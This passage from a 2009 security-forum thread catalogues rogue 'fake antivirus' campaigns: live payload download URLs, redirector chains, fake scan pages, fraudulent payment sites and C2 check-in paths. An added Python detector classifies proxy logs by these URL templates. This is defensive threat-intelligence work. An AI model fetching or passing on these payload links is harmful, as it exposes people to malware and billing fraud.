vuleskanorionas.com
wertubertagosad.com
wertugalionasewa.com
wertugalionetsa.com
wervaferganiota.com

fake windows security suite:
Code: [Select]
vmeltonline.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
webssearch.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
search-out.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
mykeepplace.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
linewebsearch.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
go-in-search.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
searchurlguide.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
secure-pro.cn/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
softsales-discount.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
safemanagment.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
searchinfoonline.net/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
safe-pay-vault.com/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo22EfYCLt1POo22eU9LXoKitiJ/Y1cRflJ2dcZqTgX6ZU9janW1jZWJsmGGXZGSeXonZ0Zqop5uikomtpXFqZmxsa3CaXpmbV5OQcQ==
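The indicators in this thread are posted defanged (hxxp://, [.]) and fall into a handful of recurring path templates: the /download/install.php installers, the in.cgi?N and go.php?id=…&key=…&p=1 redirectors, the .cn droppers above that serve "whatever you want with .exe", the /N/installer/Installer.exe path of the Fakerean domains, and the check-in URLs visible in the Anubis logs of the June 28 post (/admin/cgi-bin/get_domain.php?type=download, /reports/minstalls.php) and the DNSChanger post (POST /cgi-bin/generator). The Python below is an added example, not part of the thread: it refangs an indicator back into a real URL and classifies proxy-log URLs by those templates so the list can be turned into a detection rather than a blocklist of hostnames that rotate daily. The log line format, client addresses and family labels are my assumptions; the hostnames in the sample log are taken from the posts.

```python
"""Refang thread indicators and match proxy-log URLs against the path templates seen in the thread (added example)."""
import re
from urllib.parse import urlsplit


def refang(ioc: str) -> str:
    """Undo the forum's defanging (hxxp://, [.]); a bare host/path gets an http:// scheme."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)
    s = s.replace("[.]", ".")
    if not re.match(r"^https?://", s, re.I):
        s = "http://" + s
    return s


# (family label, regex over path + "?" + query). Labels are assumed names, not vendor ones.
FAMILIES = [
    ("fakeav-installer", re.compile(r"^/download/install\.php$")),
    ("tds-redirect", re.compile(r"^/in\.cgi\?\d+$")),
    ("affiliate-redirect", re.compile(r"^/go\.php\?id=\d+(-\d+)?&key=[0-9a-f]+&p=\d+$")),
    ("installer-path", re.compile(r"^/\d/installer/Installer\.exe(\?.*)?$")),
    ("cn-dropper", re.compile(r"^/(installer_1|install|test)\.exe$")),
    ("c2-checkin", re.compile(
        r"^/(cgi-bin/generator"
        r"|admin/cgi-bin/get_domain\.php\?type=download"
        r"|reports/minstalls\.php)$")),
]


def classify(url: str):
    """Return the family label whose template matches the URL's path and query, or None."""
    u = urlsplit(refang(url))
    target = u.path + ("?" + u.query if u.query else "")
    for label, rx in FAMILIES:
        if rx.search(target):
            return label
    return None


def scan_proxy_log(lines) -> list:
    """Return (client, url, family) for each log line whose URL matches a template.

    Assumed line format: "<client> <method> <url> <status>".
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        client, url = parts[0], parts[2]
        family = classify(url)
        if family:
            hits.append((client, url, family))
    return hits


# Constructed proxy log; hostnames and paths are the ones listed in the thread, clients are made up.
SAMPLE_LOG = [
    "10.0.0.5 GET http://areascan4.info/download/install.php 200",
    "10.0.0.5 GET http://nakedfridaydresscode.com/in.cgi?6 302",
    "10.0.0.7 GET http://b2b-forums.cn/go.php?id=2013-01&key=a98402e2d&p=1 302",
    "10.0.0.7 GET http://aguraot.cn/installer_1.exe 200",
    "10.0.0.8 GET http://wertabulionsedaf.com/2/installer/Installer.exe?u=1025&s=e8f4f9a25ccda16144f11cd34e2528ff&t=2 200",
    "10.0.0.9 POST http://213.163.64.81/cgi-bin/generator 200",
    "10.0.0.9 GET http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download 200",
    "10.0.0.2 GET http://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for client, url, family in scan_proxy_log(SAMPLE_LOG):
        print(f"{client:<10} {family:<20} {url}")
```

The templates deliberately anchor on path and query shape rather than on hostnames: the thread shows the same /download/install.php and go.php?id=…&key=… handlers reappearing under dozens of fresh domains and several IPs, so the path is the indicator that survives the domain churn. Tighten the `in.cgi` and `.exe` rules before using them on a busy proxy, since both shapes also occur in legitimate traffic.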
Title: Re: Rogue - Fake AV
Post by: sriramp on August 20, 2009, 12:09:12 pm
http://addedantiviruspro.com/
http://addedantiviruslive.com/
http://yourcountedantivirus.com/
http://easyaddedantivirus.com/
http://myplusantiviruspro.com/
http://addedantivirusonline.com/
http://addedantivirusstore.com/
http://realantivirusplus09.com/
http://freeantivirusplus09.com/
http://getantivirusplusnow.com/
http://antivirusplusnow.com/
http://megaantivirusplus.com/
http://getavplusnow.com/
http://antivirusplus-ok.com/
http://nextantivirusplus.com/
http://i-antivirusplus.com/
http://goodantivirusplus.com/
http://yesantivirusplus.com/
http://antivirus-plus-now.com/
http://antivirusplus09.com/
http://internetantivirusplus.com/
http://mybestantivirusplus.com/
http://antivirusplus2010.com/
Title: Re: Rogue - Fake AV
Post by: SpiderLover on August 21, 2009, 11:50:14 pm
Fake AV Scan Page.

Code: [Select]
hqpcscanner.com/online/9a8e5e72bfe78caae6a2b07ff47b6602/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2
Payload.

Code: [Select]
veikalerd.com/download/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2/14
Title: Re: Rogue - Fake AV
Post by: SysAdMini on August 22, 2009, 06:21:14 am
Fake AV Scan Page.

Code: [Select]
hqpcscanner.com/online/9a8e5e72bfe78caae6a2b07ff47b6602/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2
Payload.

Code: [Select]
veikalerd.com/download/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2/14

downloads Rogue Savesoldier
http://www.threatexpert.com/report.aspx?md5=455c8798ec8441ed406d57c79b16f9f7

Code: [Select]
www.savesoldier.com/downloader.php?p=NvquysXZPvzWwOJYEkMBu7bYMTU%2F5q6WKFFJRk0LPDM%3D
http://www.virustotal.com/analisis/76f8e18f0e8df2c8e91bc2f8595dc1ac06f4221a2912443bd68222d05f7929bb-1250922382 3/41
Title: Re: Rogue - Fake AV
Post by: SpiderLover on August 30, 2009, 04:49:45 pm
Code: [Select]
http://newwayscanner.info/24/24-021wL1AzLwEzL==
Fake AV Scan Page.

Code: [Select]
ntrytodownload.info/install.exe
Downloads Rogue.

Title: Re: Rogue - Fake AV
Post by: XiTri on September 02, 2009, 09:06:47 am
Code: [Select]
hxxp://av-scan-64.com/
hxxp://boomexe.com/av-scanner.0.exe
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 03, 2009, 04:53:09 pm
Code: [Select]
angelinajmovies.cn
redirects to
Code: [Select]
sexy-pornoz.ru/free-porn.php
redirects to fake antivirus
Code: [Select]
vrenutredo.com/download/a37bddc7e715b39b2dd0578c63441da5/3656b9eddb95cfb9d7f013ed46b015a2
http://www.virustotal.com/analisis/2aa00fc173d127686d152f8bd081d9f82015f245a687a23a17ac77661cbf57a3-1251996391 6/41
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 05, 2009, 02:15:11 pm
There are a lot of fake AV today, especially in VELCOM's network.

WindowsSystemSuite Family

work with:

/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%3D%3D

Code: [Select]
searchsafetyprotection.net
search-systemshield.com
system-guard.net
virusfilter-zone.net
winprotection-suite.net
go-scansystem.net
scanvirus-online.net
scansystem-online.com
scansystemonline.com
go-searchprotection.com
gotomyprotectedzone.com
myprotected-zone.com
mysecurityshield.net
scanonline-protect.com
newpcguard.net
safetysystem-shield.net
searchpcguard.com
mysystemsecurity.com
secure-systemshield.com
searchsecureguard.com
pconlinescan.net
scanandsecure.net
gosearchinweb.com
safetysystem-shield.com
mysecurity-zone.net
securesystemguard.net
gotomyprotectedzone.net
secure-systemshield.net
secure-systemguard.net
secure-systemguard.com
scan-secure.net
checkvirus-zone.net
scanonline-protect.net
myvirusscanner.net

associated:

Code: [Select]
windowssecuritysuite-pro.com
windowsguardsuite.com
windowsadditionalguard.com
update1.windowsadditionalguard.com
update2.windowsadditionalguard.com
pay1.windowsadditionalguard.com
pay2.windowsadditionalguard.com
windowsguardpro.com
update1.windowsguardpro.com
update2.windowsguardpro.com

other fake av:
Code: [Select]
homepersonalantivirus.com
extra-antivir.com

Code: [Select]
quickhealcleaner.com
greenbillsystem.com (payment page)

fake alert (personal antivirus)

work with /download/Antivirus_21.exe

Code: [Select]
antivirusquickscan3.com
antivirusquickscan5.com
advancedpcscanner3.com
advancedvirscanner3.com
advancedpcscanner9.com
advancedpcscanner6.com
advancedpcscanner2.com
best-virus-scanner4.com
antivirusquickscan3.com
antivirusquickscan5.com
bestantivirusscanv8.com

AntivirusSystemPro:
Code: [Select]
awareremover.com
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 06, 2009, 09:02:59 pm
extremely low detection, VT 2/41 atm

Code: [Select]
antivirus-fast-scan04.com/download/Antivirus_21.exe
antivirus-fast-scan05.com/download/Antivirus_21.exe
antivirus-fast-scan02.com/download/Antivirus_21.exe
antivirus-fast-scan01.com/download/Antivirus_21.exe
http://www.virustotal.com/analisis/288bf2c3a9b50368420995c6260cec46014a2ba3501e12edbbb3e11eb5d9e4df-1252270831
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 06, 2009, 10:15:59 pm
all these sites got 1/40 or 2/40

Code: [Select]
antivirusquickscan2.com/download/Antivirus_21.exe

Wepawet (http://wepawet.iseclab.org/view.php?hash=cad4e778120becff8d691fdc321a59a8&t=1252275850&type=js)
VirusTotal (http://www.virustotal.com/analisis/8b1121fc5f8d483d096b141933e5062162d01068cdc7eba46609e509f212c165-1252262197) - 1/41 (2.44%)

http://www.malwareurl.com/search.php?s=fakexpa&rp=500&urls=on

The redirectors are:

Code: [Select]
mashroomtheory.cn/go.php?id=2004&key=ff0057594&p=1
space2009city.cn/go.php?id=2004&key=ff0057594&p=1
greattime2009.cn/go.php?id=2004&key=ff0057594&p=1
iwanttowin.cn/go.php?id=2004&key=ff0057594&p=1
hardnut.cn/go.php?id=2004&key=ff0057594&p=1
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 08, 2009, 05:44:20 am
Fake av: personal antivirus
Code: [Select]
fast-virus-scan9.com
fast-virus-scan7.com
fast-virus-scan2.com
superb-virus-scan03.com
reliable-scanner05.com
reliable-scanner06.com
reliable-scanner09.com

some redirects to rogue av: (all registered by spscript@hotmail.com)
Code: [Select]
nyhciud.cn/?uid=186&pid=3&ttl=5144e4b9545
zimujal.cn/?uid=186&pid=3&ttl=5144e4b9545
anoujek.cn/?uid=186&pid=3&ttl=5144e4b9545
capide.cn/?uid=186&pid=3&ttl=5144e4b9545
erufyid.cn/?uid=186&pid=3&ttl=5144e4b9545
oziyma.cn/?uid=186&pid=3&ttl=5144e4b9545
omeoqka.cn/?uid=186&pid=3&ttl=5144e4b9545
vijbyas.cn/?uid=186&pid=3&ttl=5144e4b9545
zymqadi.cn/?uid=186&pid=3&ttl=5144e4b9545
osujyre.cn/in.cgi?9&tsk=id897-12june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
iqipevo.cn/in.cgi?9&tsk=id308-01july09-r91&type=l&seoref=
uzehayb.cn/in.cgi?9&tsk=id894-09june09-r35&type=l&seoref=
susnoj.cn/in.cgi?9&tsk=id894-09june09-r35&type=l&seoref=
waztuok.cn/in.cgi?9&tsk=id908-15june09-r35&type=l&seoref=
ucuywih.cn/in.cgi?9&tsk=id900-13june09-r35&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
avagujy.cn/in.cgi?9&tsk=id900-13june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
cybipmo.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
aqobeyv.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ynyxeg.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upiumry.cn/in.cgi?9&tsk=id897-12june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
oqaezfy.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ediyhy.cn/in.cgi?9&tsk=id842-03may09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
lycurvo.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
gevyta.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
tudanyg.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ubaunki.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ugezuso.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ukodun.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upeozab.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
sozefpa.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
uleyvom.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
isavifo.cn/in.cgi?9
itogym.cn/in.cgi?9
muvytas.cn/in.cgi?6
uhaulde.cn/in.cgi?6
sipyjo.cn/in.cgi?6
kukbize.cn/in.cgi?6

fakevimes:
Code: [Select]
safetysystem-protect.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-protect.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-checkvirus.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-checkvirus.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-guard.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-guard.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
systemscan-secure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
systemscan-secure.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-virusscanner.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-virusscanner.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-scanvirus.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-scanvirus.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-protectonline.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-systemshield.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-systemshield.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%

winwebsec:
Code: [Select]
thesecuritywinscan.com
safetyscantool.com

internetantiviruspro:
Code: [Select]
wzand.info/download/install.php
redirects to rogue av:
Code: [Select]
iliconsmoon.com/?uid=186&pid=3&ttl=5144e4b9545
lounge-officers.com/?pid=57&sid=cac46c
messengerinfo.cn/go.php?id=2004&key=ff0057594&p=1
leasom.com/?uid=186&pid=3&ttl=51840429734
news-feedster.com/?uid=186&pid=3&ttl=51840429734

total security:
Code: [Select]
85.17.145.123
traiden.org
verticalt.com
shontecltd.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 10, 2009, 09:27:36 am
trojan
Code: [Select]
cubeexe.com/av-scanner.0.exe
directs to trojan:
Code: [Select]
free-checkpc.com/l/dc912a2588i80u79x
trojan:
Code: [Select]
safe-fileshere.com/s/wf61d694792s74i71p/setup.exe
rogue av - fakeplus
Code: [Select]
avplus2010.com/redirect.php (redirects)
avplus2010.com/se.exe (trojan)
avplus2010.com/buy.php (fraudulent payment page)
avplus2010.com/install/InternetExplorer.dll (trojan)
avplus2010.com/install/avplus.exe (fake av)
avplus2010.com/install/AntivirusPlus.exe (fake av)
avplus2010.com/install/AntivirusPlus_ba.exe (fake av)
avplus2010.com/install/AntivirusPlus.grn (fake av config)
avplus2010.com/cb/real.php (phone back location)
avplus2010.com/cfg/dmns.cfg (returns list of related domains)

same as:
Code: [Select]
antivirplus2009.com
realbestantivirusplus.com
the fake payment page:
Code: [Select]
my-secure-payment.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=
fakeplus loader:
Code: [Select]
inagyve.cn/installer_1.exe
hiqtacy.cn/installer_1.exe

internetantiviruspro:
Code: [Select]
benber.info/download/install.php
totalsecurity:
Code: [Select]
fuck-celebrities-movie.com/tube/softwarefortubeview.exe
securityscantoolguide.com/in.php (redirects)
securityscantoolguide.com/hitin.php (redirects)
securityscantoolguide.com/scan.php (fake scan page)
securityscantoolguide.com/scanonline.php (fake scan page)
securityscantoolguide.com/index.php (fake scan page)
securityscantoolguide.com/download.php (payload)
securityscantoolguide.com/install/ws.exe (payload)
securityscantoolguide.com/temp/links.txt (config for links)
securityscantoolguide.com/tempin/links.txt (config for links)

same as:
Code: [Select]
bestsecurityjobs.com
thesecuritywinscan.com

directs to fraudulent payment page:
Code: [Select]
demetraindustries.com/pay.php?id=
secure.personalpurchuasesite.com/buy.php?

redirects to fake av:
Code: [Select]
bestinvestmentssolution.com/?pid=99s01&sid=cd5681
spacestations-online.com/?pid=157s01&sid=0cda24
willsmithinc.cn/go.php?id=2020-01&key=f804e386a&p=1
batman-comics.cn/go.php?id=2019&key=572c78987&p=1
beststarwars.cn/go.php?id=2013-01&key=a98402e2d&p=1

fakevimes:
Code: [Select]
onlinesystemscan.net
online-systemscan.com
online-securescanner.com
online-scanandsecure.net
onlinescansystem.com
onlinescansystem.net
onlinesystemscan.com

working url:
/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 10, 2009, 05:58:29 pm
payment pages for rogue av:

https
Code: [Select]
absbillnow.com/payment/?sku_name=
secure.absbillnow.com/payment/?sku_name=
secure.billingsecurepayment.com/payment/?sku_name=QDM_EN

personal antivirus:
Code: [Select]
secure.onlinesoftwarebilling.com/billing/?
secure.onlinestoresystem.com/billing/?
secure.order-software-online.com/billing/?
secure.personalpurchuasesite.com/buy.php?
secure.smart-online-shop.com/billpav/?world&
smart-online-shop.com/download.php
smart-online-shop.com/buy.php
smart-online-shop.com/billing/
secure.worldsoftwarestore.com/download.php
secure.worldsoftwarestore.com/buy.php
secure.worldsoftwarestore.com/billing/
worldsoftwarestore.com/download.php
worldsoftwarestore.com/buy.php
worldsoftwarestore.com/billing/

http

Code: [Select]
billing365solution.com/payment/?sku_name=
secure.billing365solution.com/payment/?sku_name=
bill-solution-365.com/payment/?sku_name=PCANSP_EN
secure.bill-solution-365.com/payment/?sku_name=PCANSP_EN
ccpaymentsys24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
cc-payment-sys24.com/payment/?sku_name=PCANSP_EN
cc-pay-system.com/payment/?sku_name=PCANSP_EN
pay-cc-24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
pay-securesystem.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.basebilling.com/payment/?sku_name=
secure.bill-service-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
bill-service-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.bill-solution-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.billsystem-24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.pay-cc-24.com/payment/?sku_name=PCANSP_EN
secure.paymentsolution24.com/payment/?sku_name=PCANSP_EN
secure.payment-solution24.com/payment/?sku_name=PCANSP_EN
paymentsolution24.com/payment/?sku_name=QDM_EN
secure.pay-securesystem.com/payment/?sku_name=PCANSP_EN

Code: [Select]
continental-systems.com/payment/?sku_name=PCANSP_EN
ecologygreenpc.com

WinAntivirusPro (Trojan FakeScanti)
Code: [Select]
212.116.123.4/signup.cgi
billmeplease.biz/signup.cgi
bill-it-now.com/signup.cgi
billmyccnow.com/signup.cgi
join2623.softwareordersx.com/signup.cgi
oftwareordersx.com/signup.cgi
ingloriousbastardsx.com/signup.cgi
core2623.ingloriousbastardsx.com/signup.cgi

total security:
Code: [Select]
onlinebillingsolution.net/buy.php
personal antivirus:
Code: [Select]
order-software-online.com
winbluesoft
Code: [Select]
billsoftpay.com/order_winbluesoft.php?order_id=8fe0553eeaf0d90230553f61192f4d8f&anticache=1249380139
paysoftbillsolution.com/order.php?order_id=f0b0fa8487746e8e3691cb6612f92afd&anticache=1251277348
safebillsolution.com/order.php?order_id=5024b39d3e7f2a1d8f0bb255332ecb1d&anticache=1248975552

personal defender:
Code: [Select]
personal08.com
pcfsupport.com

smart virus eliminator:
Code: [Select]
rss-checkfeeds.com/bill/?pc_id=&uid=&ls=&bid=&t=&pid=3&sid=&StrWinOS=&prID=3&abbr=SMVE
privacyguardpro:
Code: [Select]
secure.privacyguardpro.com/index.php?SECURITY_CODE=2155
malwares eradicator:
Code: [Select]
malwareseradicator.com
secure.softhotspot.com/cgi-bin/bill.cgi?id=148&type=cc
softhotspot.com/cgi-bin/bill.cgi?id=148&type=cc

